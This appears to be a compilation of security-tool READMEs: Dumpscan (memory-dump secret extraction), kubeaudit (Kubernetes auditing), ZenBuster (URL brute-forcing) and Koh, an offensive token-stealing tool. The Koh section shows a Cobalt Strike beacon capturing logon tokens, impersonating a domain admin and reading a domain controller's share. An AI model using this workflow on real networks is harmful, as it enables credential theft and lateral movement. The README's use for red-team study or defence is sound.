Dumpscan is a command-line tool designed to extract and dump secrets from kernel and Windows Minidump formats. Kernel-dump parsing is provided by volatility3.


Features

  • x509 Public and Private key (PKCS #8/PKCS #1) parsing
  • SymCrypt parsing
    • Supported structures
      • SYMCRYPT_RSAKEY - Determines if the key structure also has a private key
    • Matching to public certificates found in the same process
    • More SymCrypt structures to come
  • Environment variables
  • Command line arguments

Note: Testing has only been performed on Windows 10 and 11 64-bit hosts and processes. Feel free to file an issue for additional versions. Linux testing TBD.
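
As a rough illustration of what x509 carving over a raw dump can look like (a sketch using the cryptography package, not Dumpscan's actual implementation):

from cryptography import x509

def carve_certs(dump: bytes):
    # 0x30 0x82 is the DER SEQUENCE-with-two-byte-length prefix typical of certs
    idx = dump.find(b"\x30\x82")
    while idx != -1:
        length = int.from_bytes(dump[idx + 2:idx + 4], "big") + 4
        try:
            yield x509.load_der_x509_certificate(dump[idx:idx + length])
        except ValueError:
            pass  # not a parseable certificate; keep scanning
        idx = dump.find(b"\x30\x82", idx + 1)

with open("process.dmp", "rb") as f:   # hypothetical minidump path
    for cert in carve_certs(f.read()):
        print(cert.subject.rfc4514_string())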

Installation

As a command-line tool, installation is recommended using pipx. This allows for easy updates as well as ensuring it is installed in its own virtual environment.

pipx install dumpscan
pipx inject dumpscan git+https://github.com/volatilityfoundation/volatility3#39e812a

Usage

 Usage: dumpscan [OPTIONS] COMMAND [ARGS]...

Scan memory dumps for secrets and keys

╭─ Options ────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ --help Show this message and exit. │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Commands ───────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ kernel Scan kernel dump using volatility │
│ minidump Scan a user-mode minidump │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯

For subcommands that extract certificates, you can provide --output/-o <dir> to write any discovered certificates to disk.

Kernel Mode

As mentioned, kernel analysis is performed by Volatility3. cmdline, envar, and pslist are direct calls to the Volatility3 plugins, while symcrypt and x509 are custom plugins.

 Usage: dumpscan kernel [OPTIONS] COMMAND [ARGS]...

Scan kernel dump using volatility

╭─ Options ────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ --help Show this message and exit. │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Commands ───────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ cmdline List command line for processes (Only for Windows) │
│ envar List process environment variables (Only for Windows) │
│ pslist List all the processes and their command line arguments │
│ symcrypt Scan a kernel-mode dump for symcrypt objects │
│ x509 Scan a kernel-mode dump for x509 certificates │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯

Minidump Mode

Supports Windows Minidump format.

Note: This has only been tested on 64-bit processes on Windows 10+. 32-bit processes require additional work but aren't a priority.

 Usage: dumpscan minidump [OPTIONS] COMMAND [ARGS]...

Scan a user-mode minidump

╭─ Options ────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ --help Show this message and exit. │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Commands ───────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ cmdline Dump the command line string │
│ envar Dump the environment variables in a minidump │
│ symcrypt Scan a minidump for symcrypt objects │
│ x509 Scan a minidump for x509 objects │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯

Built With

Acknowledgements

  • Thanks to F-Secure and the physmem2profit project for providing the idea to use construct for parsing minidumps.
  • Thanks to Skelsec and his minidump project, which helped me figure out how to parse minidumps.

To-Do

  • Verify use against 32-bit minidumps
  • Create a coredump parser for Linux process dumps
  • Verify volatility plugins work against Linux kernel dumps
  • Add an HTML report that shows all plugins
  • Code refactoring to make more extensible
  • MORE SECRETS


Kubeaudit - Tool To Audit Your Kubernetes Clusters Against Common Security Controls



kubeaudit is a command line tool and a Go package to audit Kubernetes clusters for various security concerns, such as:

  • run as non-root
  • use a read-only root filesystem
  • drop scary capabilities, don't add new ones
  • don't run privileged
  • and more!

tldr. kubeaudit makes sure you deploy secure containers!

Package

To use kubeaudit as a Go package, see the package docs.

The rest of this README will focus on how to use kubeaudit as a command line tool.

Command Line Interface (CLI)

Installation

Brew

brew install kubeaudit

Download a binary

Kubeaudit has official releases that are blessed and stable: Official releases

DIY build

Master may have newer features than the stable releases. If you need a newer feature not yet included in a release, make sure you're using Go 1.17+ and run the following:

go get -v github.com/Shopify/kubeaudit

Start using kubeaudit with the Quick Start or view all the supported commands.

Kubectl Plugin

Prerequisite: kubectl v1.12.0 or later

With kubectl v1.12.0 introducing easy pluggability of external functions, kubeaudit can be invoked as kubectl audit by

  • running make plugin and having $GOPATH/bin available in your path.

or

  • renaming the binary to kubectl-audit and having it available in your path.

Docker

We also release a Docker image: shopify/kubeaudit. To run kubeaudit as a job in your cluster see Running kubeaudit in a cluster.

Quick Start

kubeaudit has three modes:

  1. Manifest mode
  2. Local mode
  3. Cluster mode

Manifest Mode

If a Kubernetes manifest file is provided using the -f/--manifest flag, kubeaudit will audit the manifest file.

Example command:

kubeaudit all -f "/path/to/manifest.yml"

Example output:

$ kubeaudit all -f "internal/test/fixtures/all_resources/deployment-apps-v1.yml"

---------------- Results for ---------------

apiVersion: apps/v1
kind: Deployment
metadata:
name: deployment
namespace: deployment-apps-v1

--------------------------------------------

-- [error] AppArmorAnnotationMissing
Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/container' should be added.
Metadata:
Container: container
MissingAnnotation: container.apparmor.security.beta.kubernetes.io/container

-- [error] AutomountServiceAccountTokenTrueAndDefaultSA
Message: Default service account with token mounted. automountServiceAccountToken should be set to 'false' or a non-default service account should be used.

-- [error] CapabilityShouldDropAll
Message: Capability not set to ALL. Ideally, you should drop ALL capabilities and add the specific ones you need to the add list.
Metadata:
Container: container
Capability: AUDIT_WRITE
...

If no errors with a given minimum severity are found, the following is returned:

All checks completed. 0 high-risk vulnerabilities found

Autofix

Manifest mode also supports autofixing all security issues using the autofix command:

kubeaudit autofix -f "/path/to/manifest.yml"

To write the fixed manifest to a new file instead of modifying the source file, use the -o/--output flag.

kubeaudit autofix -f "/path/to/manifest.yml" -o "/path/to/fixed"

To fix a manifest based on custom rules specified on a kubeaudit config file, use the -k/--kconfig flag.

kubeaudit autofix -k "/path/to/kubeaudit-config.yml" -f "/path/to/manifest.yml" -o "/path/to/fixed"

Cluster Mode

Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster:

kubeaudit all

Local Mode

Kubeaudit will try to connect to a cluster using the local kubeconfig file ($HOME/.kube/config). A different kubeconfig location can be specified using the --kubeconfig flag. To specify a context of the kubeconfig, use the -c/--context flag.

kubeaudit all --kubeconfig "/path/to/config" --context my_cluster

For more information on kubernetes config files, see https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/

Audit Results

Kubeaudit produces results with three levels of severity:

  • Error: A security issue or invalid kubernetes configuration
  • Warning: A best practice recommendation
  • Info: Informational, no action required. This includes results that are overridden

The minimum severity level can be set using the --minSeverity/-m flag.

By default kubeaudit will output results in a human-readable way. If the output is intended to be further processed, it can be set to output JSON using the --format json flag. To output results as logs (the previous default) use --format logrus. Some output formats include colors to make results easier to read in a terminal. To disable colors (for example, if you are sending output to a text file), you can use the --no-color flag.

If there are results of severity level error, kubeaudit will exit with exit code 2. This can be changed using the --exitcode/-e flag.
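
With --format json, results are machine-readable; a hedged post-processing sketch (the one-object-per-line framing and field names like level and msg are assumptions about the output shape):

import json, subprocess

proc = subprocess.run(
    ["kubeaudit", "all", "-f", "/path/to/manifest.yml", "--format", "json"],
    capture_output=True, text=True,
)
for line in proc.stdout.splitlines():
    if not line.strip():
        continue
    result = json.loads(line)              # assumption: one JSON object per line
    if result.get("level") == "error":     # field names are assumptions
        print(result.get("AuditResultName"), "-", result.get("msg"))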

For all the ways kubeaudit can be customized, see Global Flags.

Commands

Command | Description | Documentation
all | Runs all available auditors, or those specified using a kubeaudit config. | docs
autofix | Automatically fixes security issues. | docs
version | Prints the current kubeaudit version. |

Auditors

Auditors can also be run individually.

Command | Description | Documentation
apparmor | Finds containers running without AppArmor. | docs
asat | Finds pods using an automatically mounted default service account. | docs
capabilities | Finds containers that do not drop the recommended capabilities or add new ones. | docs
deprecatedapis | Finds any resource defined with a deprecated API version. | docs
hostns | Finds containers that have HostPID, HostIPC or HostNetwork enabled. | docs
image | Finds containers which do not use the desired version of an image (via the tag) or use an image without a tag. | docs
limits | Finds containers which exceed the specified CPU and memory limits or do not specify any. | docs
mounts | Finds containers that have sensitive host paths mounted. | docs
netpols | Finds namespaces that do not have a default-deny network policy. | docs
nonroot | Finds containers running as root. | docs
privesc | Finds containers that allow privilege escalation. | docs
privileged | Finds containers running as privileged. | docs
rootfs | Finds containers which do not have a read-only filesystem. | docs
seccomp | Finds containers running without Seccomp. | docs

Global Flags

Short | Long | Description
 | --format | The output format to use (one of "pretty", "logrus", "json") (default is "pretty")
 | --kubeconfig | Path to local Kubernetes config file. Only used in local mode (default is $HOME/.kube/config)
-c | --context | The name of the kubeconfig context to use
-f | --manifest | Path to the yaml configuration to audit. Only used in manifest mode. You may use - to read from stdin.
-n | --namespace | Only audit resources in the specified namespace. Not currently supported in manifest mode.
-g | --includegenerated | Include generated resources in scan (such as Pods generated by deployments). Use this flag if you would like kubeaudit to produce results for generated resources (for example if you have custom resources or want to catch orphaned resources where the owner resource no longer exists).
-m | --minseverity | Set the lowest severity level to report (one of "error", "warning", "info") (default is "info")
-e | --exitcode | Exit code to use if there are results with severity of "error". Conventionally, 0 is used for success and all non-zero codes for an error. (default is 2)
 | --no-color | Don't use colors in the output (default is false)

Configuration File

The kubeaudit config can be used for two things:

  1. Enabling only some auditors
  2. Specifying configuration for auditors

Any configuration that can be specified using flags for the individual auditors can be represented using the config.

The config has the following format:

enabledAuditors:
  # Auditors are enabled by default if they are not explicitly set to "false"
  apparmor: false
  asat: false
  capabilities: true
  deprecatedapis: true
  hostns: true
  image: true
  limits: true
  mounts: true
  netpols: true
  nonroot: true
  privesc: true
  privileged: true
  rootfs: true
  seccomp: true
auditors:
  capabilities:
    # add capabilities needed to the add list, so kubeaudit won't report errors
    allowAddList: ['AUDIT_WRITE', 'CHOWN']
  deprecatedapis:
    # If no versions are specified and the 'deprecatedapis' auditor is enabled, WARN
    # results will be generated for the resources defined with a deprecated API.
    currentVersion: '1.22'
    targetedVersion: '1.25'
  image:
    # If no image is specified and the 'image' auditor is enabled, WARN results
    # will be generated for containers which use an image without a tag
    image: 'myimage:mytag'
  limits:
    # If no limits are specified and the 'limits' auditor is enabled, WARN results
    # will be generated for containers which have no cpu or memory limits specified
    cpu: '750m'
    memory: '500m'

For more details about each auditor, including a description of the auditor-specific configuration in the config, see the Auditor Docs.

Note: The kubeaudit config is not the same as the kubeconfig file specified with the --kubeconfig flag, which refers to the Kubernetes config file (see Local Mode). Also note that only the all and autofix commands support using a kubeaudit config. It will not work with other commands.

Note: If flags are used in combination with the config file, flags will take precedence.

Override Errors

Security issues can be ignored for specific containers or pods by adding override labels. This means the auditor will produce info results instead of error results and the audit result name will have Allowed appended to it. The labels are documented in each auditor's documentation, but the general format for auditors that support overrides is as follows:

An override label consists of a key and a value.

The key is a combination of the override type (container or pod) and an override identifier which is unique to each auditor (see the docs for the specific auditor). The key can take one of two forms depending on the override type:

  1. Container overrides, which override the auditor for that specific container, are formatted as follows:
container.audit.kubernetes.io/[container name].[override identifier]
  2. Pod overrides, which override the auditor for all containers within the pod, are formatted as follows:
audit.kubernetes.io/pod.[override identifier]

If the value is set to a non-empty string, it will be displayed in the info result as the OverrideReason:

$ kubeaudit asat -f "auditors/asat/fixtures/service-account-token-true-allowed.yml"

---------------- Results for ---------------

apiVersion: v1
kind: ReplicationController
metadata:
name: replicationcontroller
namespace: service-account-token-true-allowed

--------------------------------------------

-- [info] AutomountServiceAccountTokenTrueAndDefaultSAAllowed
Message: Audit result overridden: Default service account with token mounted. automountServiceAccountToken should be set to 'false' or a non-default service account should be used.
Metadata:
OverrideReason: SomeReason

As per Kubernetes spec, value must be 63 characters or less and must be empty or begin and end with an alphanumeric character ([a-z0-9A-Z]) with dashes (-), underscores (_), dots (.), and alphanumerics between.
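
That rule is easy to encode as a pre-flight check; a small sketch of the value constraint as a regex:

import re

# empty, or 63 chars max: alphanumeric at both ends, [-_.] and alphanumerics between
LABEL_VALUE = re.compile(r"^$|^[A-Za-z0-9]([A-Za-z0-9._-]{0,61}[A-Za-z0-9])?$")

assert LABEL_VALUE.fullmatch("SomeReason")
assert not LABEL_VALUE.fullmatch("-starts-with-a-dash")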

Multiple override labels (for multiple auditors) can be added to the same resource.

See the specific auditor docs for the auditor you wish to override for examples.

To learn more about labels, see https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/

Contributing

If you'd like to fix a bug, contribute a feature or just correct a typo, please feel free to do so as long as you follow our Code of Conduct.

  1. Create your own fork!
  2. Get the source: go get github.com/Shopify/kubeaudit
  3. Go to the source: cd $GOPATH/src/github.com/Shopify/kubeaudit
  4. Add your forked repo as a fork: git remote add fork https://github.com/you-are-awesome/kubeaudit
  5. Create your feature branch: git checkout -b awesome-new-feature
  6. Install Kind
  7. Run the tests to see everything is working as expected: make test (to run tests without Kind: USE_KIND=false make test)
  8. Commit your changes: git commit -am 'Adds awesome feature'
  9. Push to the branch: git push fork
  10. Sign the Contributor License Agreement
  11. Submit a PR (all PRs must be labeled with one of: Bug fix, New feature, Documentation update, or Breaking changes)
  12. ???
  13. Profit

Note that if you didn't sign the CLA before opening your PR, you can re-run the check by adding a comment to the PR that says "I've signed the CLA!"



Zenbuster - Multi-threaded URL Enumeration/Brute-Forcing Tool



ZenBuster is a multi-threaded, multi-platform URL enumeration tool written in Python by Zach Griffin (@0xTas).

I wrote this tool as a way to deepen my familiarity with Python, and to help increase my understanding of cybersecurity tooling in general. ZenBuster may not be the fastest or most comprehensive tool of its kind. It is, however, simple to use, decently flexible, and in practice only marginally slower than other tried-and-true tools like Gobuster. Personally, I have been using it to help me solve CTF challenges on platforms like TryHackMe, and have found my implementation to be satisfactorily reliable.

This software is intended for use in CTF challenges, or by security professionals to gather information on their targets:

  • It is capable of brute-force enumerating subdomains and also URI resources (directories/files); a sketch of the general approach appears after this list.
  • Both methods of enumeration require use of an appropriate wordlist or dictionary file.
  • Features Include:
    1. Hostname format supports standard, IPv4, and IPv6.
    2. Support for logging results to a file with -O [filename].
    3. Specifying custom ports for nonstandard webservers with -p .
    4. Optional file extensions in directory mode with -x .
    5. Quiet mode for less distracting output with -Q.
    6. Color can be disabled for less distracting output with -nc/-nl.
    7. Tested on Python versions 3.9 and 3.10, with theoretical support for versions >= 3.6
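
For a sense of what multi-threaded enumeration like this boils down to, here is a hedged sketch of the general approach (requests plus a thread pool; not ZenBuster's actual code, and target.thm/wordlist.txt are placeholders):

import requests
from concurrent.futures import ThreadPoolExecutor

def probe(base: str, word: str):
    url = f"{base.rstrip('/')}/{word}"
    try:
        r = requests.get(url, timeout=5, allow_redirects=False)
        if r.status_code != 404:        # anything but 404 is worth reporting
            print(r.status_code, url)
    except requests.RequestException:
        pass                            # timeouts, refused connections, etc.

with open("wordlist.txt") as f:
    words = [w.strip() for w in f if w.strip()]

with ThreadPoolExecutor(max_workers=20) as pool:
    for w in words:
        pool.submit(probe, "http://target.thm", w)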

CAUTION/DISCLAIMER

ZenBuster is capable of producing a potentially unwelcome number of HTTP requests in a short amount of time.

The developers and contributors are not liable or responsible for any damage caused by misuse or abuse of this software.

Please Enumerate Responsibly!

License


ZenBuster is licensed under the GNU GPLv3 License, see here for more information.

Credits

The Yin-Yang ASCII art in the banners was created by Joan G. Stark (jgs) and Hayley Jane Wakenshaw (hjw). Modifications were made by me, when specified with: 'zg'.


Installation

Firstly, ensure that Python version >= 3.6 is installed, then clone the repository with:

git clone https://github.com/0xTas/zenbuster.git

Next, cd zenbuster.

Dependencies

ZenBuster relies on 3 external libraries to function, and it is recommended to install these with:

pip install -r requirements.txt

The modules that will be installed and their purposes are as follows:

  1. Python requests

    • The backbone of each enumeration request. Without this, the script will not function.
  2. termcolor

    • Enables colored terminal output. Non-critical, the script can still run without color if this is not present.
  3. colorama (Windows only)

    • Primes the Windows terminal to accept ANSI color codes (from Termcolor). Non-critical.

These dependencies may be installed manually, with pip using requirements.txt, or via interaction with the script upon first run.


Usage

Once dependencies have been installed, you can run the program in the following ways:

On Linux (+Mac?):

./zenbuster.py [options] or python3 zenbuster.py [options]

On Windows:

python zenbuster.py [options]

[Options]

Short Flag | Long Flag | Purpose
-h | --help | Displays the help screen and exits
-d | --dirs | Enables Directory Enumeration Mode
-s | --ssl | Forces usage of HTTPS in requests
-v | --verbose | Prints verbose info to terminal/log
-q | --quiet | Minimal terminal output until final results
-nc | --no-color | Disables colored terminal output
-nl | --no-lolcat | Disables lolcat-printed banner (Linux only)
-u <hostname> | --host | Host to target for the scan
-w <wordlist> | --wordlist | Path to wordlist/dictionary file
-x <exts> | --ext | Comma-separated list of file extensions (Dirs only)
-p <port#> | --port | Custom port option for nonstandard webservers
-o [filename] | --out-file | Log results to a file (accepts custom name/path)

Example Usage

./zenbuster.py -d -w /usr/share/wordlists/dirb/common.txt -u target.thm -v

python3 zenbuster.py -w ../subdomains.txt --host target.thm --ssl -O myResults.log

zenbuster -w subdomains.txt -u target.thm --quiet (With .bashrc alias)


Planned Features/Improvements

  • Increased levels of optional verbosity.
  • Allow optional throttling of task thread-count.
  • Allow users to modify the list of ignored status codes.
  • Allow greater user control over various request headers.
  • Allow optional ignoring of responses based on content-length.
  • Expand subdomain enumeration to include OSINT methods instead of just brute-forcing.
  • Explore a more comprehensive and source-readable solution to fancy colored output (possibly using rich).

Known Issues/Limitations

  • Enumerating long endpoints may result in ugly terminal output due to line-wrapping on smaller console windows. Logging to a file is recommended, especially on Windows.
  • If target host is a vHost on a shared webserver, enumeration via IP may not function as expected. Use domain/hostname instead.


Koh - The Token Stealer



Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.

Some code was inspired by Elad Shamir's Internal-Monologue project (no license), as well as KB180548. For why this is possible and Koh's approach, see the Technical Background section of this README.

For a deeper explanation of the motivation behind Koh and its approach, see the Koh: The Token Stealer post.

@harmj0y is the primary author of this code base. @tifkin_ helped with the approach, BOF implementation, and some token mechanics.

Koh is licensed under the BSD 3-Clause license.


Koh Server

The Koh "server" captures tokens and uses named pipes for control/communication. This can be wrapped in Donut and injected into any high-integrity SYSTEM process (see The Inline Shenanigans Bug).

Compilation

We are not planning on releasing binaries for Koh, so you will have to compile yourself :)

Koh has been built against .NET 4.7.2 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build. The Koh.exe assembly and the Donut-built Koh.bin PIC will be output to the main directory. The Donut blob is both x86/x64 compatible, and is built with the following options using v0.9.3 of Donut at ./Misc/Donut.exe:

[ Instance type : Embedded
[ Entropy       : Random names + Encryption
[ Compressed    : Xpress Huffman
[ File type     : .NET EXE
[ Parameters    : capture
[ Target CPU    : x86+amd64
[ AMSI/WDLP     : abort

Donut's license is BSD 3-clause.

Usage

Koh.exe <list | monitor | capture> [GroupSID1 GroupSID2 ...]

  • list - lists (non-network) logon sessions
  • monitor - monitors for new/unique (non-network) logon sessions
  • capture - captures one unique token per SID found for new (non-network) logon sessions

Group SIDs can be supplied on the command line as well, causing Koh to monitor/capture only logon sessions that contain the specified group SIDs in their negotiated token information.

Example - Listing Logon Sessions

C:\Temp>Koh.exe list

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: list

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Origin LUID : 1677733 (0x1999a5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Example - Monitoring for Logon Sessions (with group SID filtering)

Only lists results that have the domain admins (-512) group SID in their token information:

C:\Temp>Koh.exe monitor S-1-5-21-937929760-3187473010-80948926-512

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: monitor

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM

[*] Targeting group SIDs:
S-1-5-21-937929760-3187473010-80948926-512

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Koh Client

The current usable client is a Beacon Object File at .\Clients\BOF\. Load the .\Clients\BOF\KohClient.cna aggressor script in your Cobalt Strike client to enable BOF control of the Koh server. The only requirement for using captured tokens is SeImpersonatePrivilege. The communication named pipe has an "Everyone" DACL but uses a basic shared password (super securez).

To compile fresh on Linux using Mingw, see the .\Clients\BOF\build.sh script. The only requirement (on Debian at least) should be apt-get install gcc-mingw-w64

Usage

beacon> help koh
koh list - lists captured tokens
koh groups LUID - lists the group SIDs for a captured token
koh filter list - lists the group SIDs used for capture filtering
koh filter add SID - adds a group SID for capture filtering
koh filter remove SID - removes a group SID from capture filtering
koh filter reset - resets the SID group capture filter
koh impersonate LUID - impersonates the captured token with the given LUID
koh release all - releases all captured tokens
koh release LUID - releases the captured token for the specified LUID
koh exit - signals the Koh server to exit

Group SID Filtering

The koh filter add S-1-5-21-<DOMAIN>-<RID> command will only capture tokens that contain the supplied group SID. This command can be run multiple times to add additional SIDs for capture. This can help prevent possible stability issues due to a large number of token leaks.

Example - Capture

"Captures" logon sessions by negotiating usable tokens for each new session.

Server:

C:\Temp>Koh.exe capture

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: capture

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Credential UserName : testuser@THESHIRE.LOCAL
Origin LUID : 1677733 (0x1999a5)

[*] Successfully negotiated a token for LUID 207990196 (hToken: 848)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Credential UserName : da@THESHIRE.LOCAL
Origin LUID : 1677765 (0x1999c5)

[*] Successfully negotiated a token for LUID 81492692 (hToken: 976)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Credential UserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999 (0x3e7)

[*] Successfully negotiated a token for LUID 1677733 (hToken: 980)

BOF client:

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Access is denied.

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> koh list
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:

Username : THESHIRE\localadmin (S-1-5-21-937929760-3187473010-80948926-1000)
LUID : 67556826
CaptureTime : 6/21/2022 1:24:42 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : localadmin@THESHIRE.LOCAL
Origin LUID : 1676720

Username : THESHIRE\da (S-1-5-21-937929760-3187473010-80948926-1145)
LUID : 67568439
CaptureTime : 6/21/2022 1:24:50 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : da@THESHIRE.LOCAL
Origin LUID : 1677765

Username : THESHIRE\harmj0y (S-1-5-21-937929760-3187473010-80948926-1104)
LUID : 1677733
CaptureTime : 6/21/2022 1:23:10 PM
LogonType : Interactive
AuthPackage : Kerberos
CredUserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999

beacon> koh groups 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
S-1-5-21-937929760-3187473010-80948926-513
S-1-5-21-937929760-3187473010-80948926-512
S-1-5-21-937929760-3187473010-80948926-525
S-1-5-21-937929760-3187473010-80948926-572

beacon> koh impersonate 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
[*] Enabled SeImpersonatePrivilege

[+] received output:
[*] Creating impersonation named pipe: \\.\pipe\imposingcost

[+] received output:
[*] Impersonation succeeded. Duplicating token.

[+] received output:
[*] Impersonated token successfully duplicated.

[+] Impersonated THESHIRE\da

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are THESHIRE\DA (admin)

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Volume in drive \\dc.theshire.local\C$ has no label.
Volume Serial Number is A4FF-7240

Directory of \\dc.theshire.local\C$

01/04/2021 11:43 AM <DIR> inetpub
05/30/2019 03:08 PM <DIR> PerfLogs
05/18/2022 01:27 PM <DIR> Program Files
04/15/2021 09:44 AM <DIR> Program Files (x86)
03/20/2020 12:28 PM <DIR> RBFG
10/20/2021 01:14 PM <DIR> Temp
05/23/2022 06:30 PM <DIR> tools
03/11/2022 04:10 PM <DIR> Users
06/21/2022 01:30 PM <DIR> Windows
0 File(s) 0 bytes
9 Dir(s) 40,504,201,216 bytes free

Technical Background

When a new logon session is established on a system, a new token for the logon session is created by LSASS using the NtCreateToken() API call and returned to the caller of LsaLogonUser(). This increases the ReferenceCount field of the logon session kernel structure. When this ReferenceCount reaches 0, the logon session is destroyed. Because of the behavior described in the Why This Is Possible section, Windows systems will NOT release a logon session if a token handle still exists for it (and therefore the reference count != 0).

So if we can get a handle to a newly created logon session via a token, we can keep that logon session open and later impersonate that token to utilize any cached credentials it contains.

Why This Is Possible

According to this post by a Microsoft engineer:

After MS16-111, when security tokens are leaked, the logon sessions associated with those security tokens also remain on the system until all associated tokens are closed... even after the user has logged off the system. If the tokens associated with a given logon session are never released, then the system now also has a permanent logon session leak as well.

MS16-111 was backported to Windows 7/Server 2008, so this approach should be effective for everything except Server 2003 systems.

Approach

Enumerating logon sessions is easy (from an elevated context) through the use of the LsaEnumerateLogonSessions() Win32 API. What is more difficult is taking a specific logon session identifier (LUID) and somehow getting a usable token linked to that session.
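
The enumeration half takes only a few API calls; as a rough illustration, a minimal C++ sketch (an elevated context is assumed and error handling is trimmed) could look like this:

#include <windows.h>
#include <ntsecapi.h>
#include <stdio.h>
#pragma comment(lib, "secur32.lib")

int main()
{
    ULONG count = 0;
    PLUID sessions = nullptr;

    // Returns an array of logon session LUIDs (requires an elevated context).
    if (LsaEnumerateLogonSessions(&count, &sessions) != 0)
        return 1;

    for (ULONG i = 0; i < count; i++) {
        PSECURITY_LOGON_SESSION_DATA data = nullptr;
        if (LsaGetLogonSessionData(&sessions[i], &data) == 0 && data) {
            wprintf(L"LUID 0x%08lx%08lx %.*s\\%.*s LogonType=%lu\n",
                (ULONG)data->LogonId.HighPart, data->LogonId.LowPart,
                data->LogonDomain.Length / 2, data->LogonDomain.Buffer,
                data->UserName.Length / 2, data->UserName.Buffer,
                data->LogonType);
            LsaFreeReturnBuffer(data);
        }
    }
    LsaFreeReturnBuffer(sessions);
    return 0;
}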

Possible Approaches

We brainstormed a few ways to a) hold open logon sessions and b) abuse this for token impersonation/use of cached credentials.

  1. The first approach was to use NtCreateToken() which allows you to specify a logon session ID (LUID) to create a new token.
    • Unfortunately, you need SeCreateTokenPrivilege which is traditionally only held by LSASS, meaning you need to steal LSASS' token which isn't ideal.
    • One possibility was to add SeCreateTokenPrivilege to NT AUTHORITY\SYSTEM via LSA policy modification, but this would need a reboot/new logon session to express the new user rights.
  2. You can also focus on just RemoteInteractive logon sessions by using WTSQueryUserToken() to get tokens for new desktop sessions to clone.
    • This is the approach apparently demonstrated by Ryan.
